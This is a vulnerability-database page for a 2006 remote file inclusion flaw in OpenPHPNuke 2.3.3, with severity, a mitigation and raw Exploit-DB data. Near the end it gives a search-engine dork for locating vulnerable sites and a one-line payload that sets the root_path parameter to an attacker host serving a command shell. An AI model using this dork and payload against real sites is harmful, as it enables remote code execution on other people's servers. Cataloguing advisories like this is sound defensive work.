header-logo
Suggest Exploit
vendor:
OpenPHPNuke
by:
[Oo]
8,8
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: OpenPHPNuke
Affected Version From: 2.3.3
Affected Version To: 2.3.3
Patch Exists: YES
Related CWE: N/A
CPE: a:openphpnuke:openphpnuke
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

OpenPHPNuke <= 2.3.3 Remote File Inclusion

A vulnerability in OpenPHPNuke <= 2.3.3 allows remote attackers to execute arbitrary code via a URL in the root_path parameter to master.php.

Mitigation:

Upgrade to OpenPHPNuke version 2.3.4 or later.
Source

Exploit-DB raw data:

Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
URL: http://www.openphpnuke.com/
Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
Credits: [Oo]

Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]

Navigation

Suggest Exploit

Services By CQR